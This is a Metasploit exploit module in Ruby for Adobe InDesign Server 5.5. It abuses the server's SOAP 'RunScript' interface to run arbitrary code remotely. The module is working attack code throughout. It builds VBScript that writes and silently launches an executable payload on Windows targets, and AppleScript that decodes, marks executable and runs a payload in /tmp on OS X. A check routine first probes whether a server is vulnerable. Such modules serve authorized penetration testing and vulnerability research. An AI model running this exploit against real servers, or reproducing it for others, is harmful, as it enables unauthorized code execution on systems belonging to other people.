Path: blob/master/modules/exploits/multi/misc/indesign_server_soap.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::EXE1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution',16'Description' => %q{17This module abuses the "RunScript" procedure provided by the SOAP interface of18Adobe InDesign Server, to execute arbitrary vbscript (Windows) or applescript (OSX).1920The exploit drops the payload on the server and must be removed manually.21},22'Author' => [23'h0ng10', # Vulnerability discovery / Metasploit module24'juan vazquez' # MacOSX target25],26'License' => MSF_LICENSE,27'Platform' => %w{osx win},28'Privileged' => false,29'DisclosureDate' => '2012-11-11',30'References' => [31[ 'OSVDB', '87548'],32[ 'URL', 'http://web.archive.org/web/20130119134644/http://secunia.com/advisories/48572/' ]33],34'Targets' => [35[36'Indesign CS6 Server / Windows (64 bits)',37{38'Arch' => ARCH_X64,39'Platform' => 'win'40}41],42[43'Indesign CS6 Server / Mac OS X Snow Leopard 64 bits',44{45'Arch' => ARCH_X64,46'Platform' => 'osx'47}48]49],50'DefaultTarget' => 0,51'Notes' => {52'Reliability' => UNKNOWN_RELIABILITY,53'Stability' => UNKNOWN_STABILITY,54'SideEffects' => UNKNOWN_SIDE_EFFECTS55}56)57)5859register_options([ Opt::RPORT(12345) ])60end6162def send_soap_request(script_code, script_type)63script_code.gsub!(/&/, '&')64soap_xml = %Q{65<?xml version="1.0" encoding="UTF-8"?>66<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"67xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"68xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">69<SOAP-ENV:Body>70<IDSP:RunScript>71<IDSP:runScriptParameters>72<IDSP:scriptText>#{script_code}</IDSP:scriptText>73<IDSP:scriptLanguage>#{script_type}</IDSP:scriptLanguage>74</IDSP:runScriptParameters>75</IDSP:RunScript>76</SOAP-ENV:Body>77</SOAP-ENV:Envelope>78}7980res = send_request_cgi({81'uri' => '/',82'method' => 'POST',83'content-type' => 'application/x-www-form-urlencoded',84'data' => soap_xml,85}, 5)86end8788def check()89# Use a very simple javascript90check_var = rand_text_numeric(10)91checkscript = 'returnValue = "' + check_var + '"'9293res = send_soap_request(checkscript, "javascript")9495return Exploit::CheckCode::Vulnerable if res.body.include?('<data xsi:type="xsd:string">' + check_var + '</data>')9697return Exploit::CheckCode::Safe98end99100def exploit101if target.name =~ /Windows/102print_status("Creating payload vbs script")103encoded_payload = generate_payload_exe().unpack("H*").join104exe_file = Rex::Text.rand_text_alpha_upper(8) + ".exe"105wsf = Rex::Text.rand_text_alpha(8)106payload_var = Rex::Text.rand_text_alpha(8)107exe_name_var = Rex::Text.rand_text_alpha(8)108file_var = Rex::Text.rand_text_alpha(8)109byte_var = Rex::Text.rand_text_alpha(8)110shell_var = Rex::Text.rand_text_alpha(8)111112# This one creates a smaller vbs payload (without deletion)113vbs = %Q{114Set #{wsf} = CreateObject("Scripting.FileSystemObject")115#{payload_var} = "#{encoded_payload}"116#{exe_name_var} = #{wsf}.GetSpecialFolder(2) + "\\#{exe_file}"117Set #{file_var} = #{wsf}.opentextfile(#{exe_name_var}, 2, TRUE)118For x = 1 To Len(#{payload_var})-3 Step 2119#{byte_var} = Chr(38) & "H" & Mid(#{payload_var}, x, 2)120#{file_var}.write Chr(#{byte_var})121Next122123#{file_var}.write Chr(#{byte_var})124#{file_var}.close125126Set #{shell_var} = CreateObject("Wscript.Shell")127#{shell_var}.Run Chr(34) & #{exe_name_var} & Chr(34), 0, False128Set #{shell_var} = Nothing129returnValue = #{exe_name_var}130}131# vbs = Msf::Util::EXE.to_exe_vbs(exe)132print_status("Sending SOAP request")133134res = send_soap_request(vbs, "visual basic")135if res != nil and res.body != nil then136file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]137print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"138end139140elsif target.name =~ /Mac OS X/141142print_status("Creating payload apple script")143144exe_payload = generate_payload_exe145b64_exe_payload = Rex::Text.encode_base64(exe_payload)146b64_payload_name = rand_text_alpha(rand(5) + 5)147payload_name = rand_text_alpha(rand(5) + 5)148149apple_script = %Q{150set fp to open for access POSIX file "/tmp/#{b64_payload_name}.txt" with write permission151write "begin-base64 644 #{payload_name}\n#{b64_exe_payload}\n====\n" to fp152close access fp153do shell script "uudecode -o /tmp/#{payload_name} /tmp/#{b64_payload_name}.txt"154do shell script "rm /tmp/#{b64_payload_name}.txt"155do shell script "chmod +x /tmp/#{payload_name}"156do shell script "/tmp/#{payload_name}"157set returnValue to "/tmp/#{payload_name}"158}159160print_status("Sending SOAP request")161162res = send_soap_request(apple_script, "applescript")163164if res != nil and res.body != nil then165file_to_delete = res.body.to_s.scan(/<data xsi:type="xsd:string">(.*)<\/data><\/scriptResult>/).flatten[0]166file_to_delete = "/tmp/#{payload_name}" if file_to_delete.nil? or file_to_delete.empty?167print_warning "Payload deployed to #{file_to_delete.to_s}, please remove manually"168elsif not res169print_status "No response, it's expected"170print_warning "Payload deployed to /tmp/#{payload_name}, please remove manually"171end172173end174end175end176177178